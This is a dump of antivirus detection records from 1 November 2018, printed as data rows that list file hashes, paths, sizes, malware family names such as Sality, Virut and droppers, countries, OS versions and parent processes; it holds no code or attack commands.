  Row(detection=Row(filename='a674f9f961326d1b73e7b83da09747f4311e064dd20e3f7d21952305944c54fd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A674F9F961326D1B73E7B83DA09747F4311E064DD20E3F7D21952305944C54FD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a674f9f961326d1b73e7b83da09747f4311e064dd20e3f7d21952305944c54fd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\E:\\8管理系统\\K3财务管理\\安装文件\\K3_Wise_v14.2_DVD\\Setup.exe', filesize=5120000, name='W32/Ramnit.CD.#M1.#R1'), hash='a6a0c25ec6b0b017f6262774fef48db21def6545255ab6ac993e826fa6faead3', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101325-b2e7ccc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_820d26ba\\AVSCAN-20181101-100037-47E38871\\AVSCAN-20181101-101325-B2E7CCC3', filesize=1544000, name='PUA/InstallCore.#M1.#R1'), hash='a6af29130b37d8eb0e1b3b0d4a52a72e995de380595d877700aa54d5d593e40d', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a6afd06f85cf749ac48dd19ccce842ec5251a0ec026e44c4159b0f2e0ace8602', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\A6AFD06F85CF749AC48DD19CCCE842EC5251A0EC026E44C4159B0F2E0ACE8602', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a6afd06f85cf749ac48dd19ccce842ec5251a0ec026e44c4159b0f2e0ace8602', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:49:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00008097', filepath='C:\\Windows\\Temp\\3fe54954-9681-461b-a9b9-3c579da05640\\tmp000002bd\\tmp00008097', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='a6ca0943233cad63a0fff78661b9b8dbf309fe8614a42b28f2b5c13b09f96d0f', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T11:27:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081828-587da8f7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-081640-431A7124\\AVSCAN-20181101-081828-587DA8F7', filesize=320000, name='TR/Black.Gen2.#M1.#R1'), hash='a6e72df8ccc11a35e64106d808aad51944b2c3ca470a8d6034e0437702dcb7d6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:18:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081759-52a72a0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-081640-431A7124\\AVSCAN-20181101-081759-52A72A0F', filesize=320000, name='TR/Black.Gen2.#M1.#R1'), hash='a6e72df8ccc11a35e64106d808aad51944b2c3ca470a8d6034e0437702dcb7d6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:18:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081651-452abaeb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-081640-431A7124\\AVSCAN-20181101-081651-452ABAEB', filesize=320000, name='TR/Black.Gen2.#M1.#R1'), hash='a6e72df8ccc11a35e64106d808aad51944b2c3ca470a8d6034e0437702dcb7d6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:16:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081734-4dc4f386', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-081640-431A7124\\AVSCAN-20181101-081734-4DC4F386', filesize=320000, name='TR/Black.Gen2.#M1.#R1'), hash='a6e72df8ccc11a35e64106d808aad51944b2c3ca470a8d6034e0437702dcb7d6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:17:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a6fa7fd692370ea377d4160c24eb0fe28ae4306076ff6f9db56419e90db599be', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-17\\A6FA7FD692370EA377D4160C24EB0FE28AE4306076FF6F9DB56419E90DB599BE', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='a6fa7fd692370ea377d4160c24eb0fe28ae4306076ff6f9db56419e90db599be', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:15:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104522-3512dbc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-104437-2C83888E\\AVSCAN-20181101-104522-3512DBC8', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a6fb33563b388ee7f70756d2fcc1f94a52c2427f2d8bc8f63b6cdbeb9db48176', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:45:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104603-3cf518b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c797463e\\AVSCAN-20181101-104114-057E7BA2\\AVSCAN-20181101-104603-3CF518B2', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a6fb33563b388ee7f70756d2fcc1f94a52c2427f2d8bc8f63b6cdbeb9db48176', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:46:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T14:13:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101420-7f0d2e7d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_671bac18\\AVSCAN-20181101-101352-7A72D4EA\\AVSCAN-20181101-101420-7F0D2E7D', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:14:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215847-b22132ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6c347803\\AVSCAN-20181101-214306-4DF0AA30\\AVSCAN-20181101-215847-B22132AB', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:58:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:32:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T10:13:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashUpdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T10:13:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00007705', filepath='C:\\Windows\\Temp\\c83c1a5d-6431-4dff-9964-1a72d49b4299\\tmp000002da\\tmp00007705', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='a7c3d130da551f228d9d026cd0580892af7aa2da431bdae2dfacd35af50faeec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T11:13:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a81da2ce40ec01a398135c85f489ca1d7077098acd35b6d695968753c1601e38.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-13.available\\Avira\\A81DA2CE40EC01A398135C85F489CA1D7077098ACD35B6D695968753C1601E38.VIR', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='a81da2ce40ec01a398135c85f489ca1d7077098acd35b6d695968753c1601e38', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:57:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185022-edcd3bed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-184947-E8A574A3\\AVSCAN-20181101-185022-EDCD3BED', filesize=64000, name='W97M/Agent.73359286.#M1.#R1'), hash='a82256df945c493b85ca0536dd2b9041b260ac517079eefa5c953e7b2cb6a7d3', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:50:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r5feaus', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$R5FEAUS', filesize=64000, name='W97M/Agent.73359286.#M1.#R1'), hash='a82256df945c493b85ca0536dd2b9041b260ac517079eefa5c953e7b2cb6a7d3', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T16:36:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a97ba4fa26c9deca56656b13df4945adf9c52ef42438375ff2cedbe27912d110.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-13.available\\Avira\\A97BA4FA26C9DECA56656B13DF4945ADF9C52EF42438375FF2CEDBE27912D110.VIR', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='a97ba4fa26c9deca56656b13df4945adf9c52ef42438375ff2cedbe27912d110', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:57:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a97f619197743a38e1c86adadc9762d8ce2fe76050a622b3e8f6ba94d5952929', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A97F619197743A38E1C86ADADC9762D8CE2FE76050A622B3E8F6BA94D5952929', filesize=372000, name='TR/Dropper.Gen.#M300.#R2295'), hash='a97f619197743a38e1c86adadc9762d8ce2fe76050a622b3e8f6ba94d5952929', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:15:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0053161.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0053161.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='a98676084090dc54c3fd136efa81b9824d1ec443433fc5b7b63c894254039619', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:29:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0048188.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0048188.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='a98676084090dc54c3fd136efa81b9824d1ec443433fc5b7b63c894254039619', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:28:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0040209.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0040209.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='a98676084090dc54c3fd136efa81b9824d1ec443433fc5b7b63c894254039619', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0330984.exe', filepath='e:\\system volume information\\_restore{64f1701b-39b4-4c9e-b329-c1179e2aa913}\\rp65\\A0330984.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='a98676084090dc54c3fd136efa81b9824d1ec443433fc5b7b63c894254039619', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lol.launcher.admin.exe', filepath='e:\\league of legends\\lol.launcher.admin.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='a98676084090dc54c3fd136efa81b9824d1ec443433fc5b7b63c894254039619', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0059195.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0059195.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='a98676084090dc54c3fd136efa81b9824d1ec443433fc5b7b63c894254039619', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:29:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='a9f62a82f6d50f83cc3176b8ea42bf6dc8a4b79625b50e2ae8b66709fdfcf111', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T22:31:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:08:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:17:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T07:12:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:02:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:21:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:18:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:40:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\system32\\AUDIODG.EXE', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='aa13c3c41c4a718e4b0c4da457094f6a51caf4689210aafa551e98bfe2f13b14', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:16:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aa1af21a06a3b7d53ecdfeffed1d395241d8b0eeb82ed7a49deb9792ad0942e8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\AA1AF21A06A3B7D53ECDFEFFED1D395241D8B0EEB82ED7A49DEB9792AD0942E8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aa1af21a06a3b7d53ecdfeffed1d395241d8b0eeb82ed7a49deb9792ad0942e8', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:16:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aa27df03a91ef3274511dd97dabffd12c041cebe7eeea4d4132bbfe7cda92a4d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\AA27DF03A91EF3274511DD97DABFFD12C041CEBE7EEEA4D4132BBFE7CDA92A4D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aa27df03a91ef3274511dd97dabffd12c041cebe7eeea4d4132bbfe7cda92a4d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aa73ec30886d71ced6e85648aab9aa49c7b6df87ba1f46e197aa7f18a99f9353', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\AA73EC30886D71CED6E85648AAB9AA49C7B6DF87BA1F46E197AA7F18A99F9353', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aa73ec30886d71ced6e85648aab9aa49c7b6df87ba1f46e197aa7f18a99f9353', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:09:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aa80ede70a3ef77838e1e211d7a29b079ad250ac68092d5ede1287c084c8422d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-17\\AA80EDE70A3EF77838E1E211D7A29B079AD250AC68092D5EDE1287C084C8422D', filesize=1408000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='aa80ede70a3ef77838e1e211d7a29b079ad250ac68092d5ede1287c084c8422d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:16:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbeetle.bug.3 .exe', filepath='\\?\\J:\\العاب\\Beetle.Bug.3\\gBeetle.Bug.3 .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='aaa02e3e86f7ecc3ca479042820a9c070535ad097868d4436f0bab6ff797def6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='addmcat.exe', filepath='D:\\pc drivers\\DP_Sound_Creative_13101 pult out\\Gigabyte\\AllNT\\GB2\\Driver\\AMD64\\Addmcat.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='aab87df0ced24043d18bcb9d931a72be9ce8b0fa7cd88dde6da8ae69aa05c386', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:30:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='upgradedownload.exe', filepath='C:\\Users\\X\\Desktop\\Desktop\\Exmobile Software\\chat 3\\UpgradeDownload.exe', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='ab15e9bc509d265560666e9663d7179f03ad0452e71c6d2c1eb75c9df0f03397', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T19:08:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='upgradedownload.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Desktop\\Exmobile Software\\chat 3\\UpgradeDownload.exe', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='ab15e9bc509d265560666e9663d7179f03ad0452e71c6d2c1eb75c9df0f03397', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:12:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aba77a91f42d6333b4f699c3952dfd435b134cd8dfa9eb004380c6f3247c47bc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\ABA77A91F42D6333B4F699C3952DFD435B134CD8DFA9EB004380C6F3247C47BC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='aba77a91f42d6333b4f699c3952dfd435b134cd8dfa9eb004380c6f3247c47bc', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobeairinstaller.exe', filepath='D:\\pindahan\\download\\Programs\\AdobeAIRInstaller.exe', filesize=18412000, name='W32/Sality.AT.#M1.#R1'), hash='abacdc4bf75adeac6ff18b6766f0db093f054719ce425ac0b239b024a784df75', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:12:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\CocCoc\\Browser\\Application\\browser.exe', parentsize=923512, timestamp='2018-11-01T12:54:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='D:\\My Documents\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:52:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T07:15:49Z'), dt=datetime.date(2018, 11, 1)),
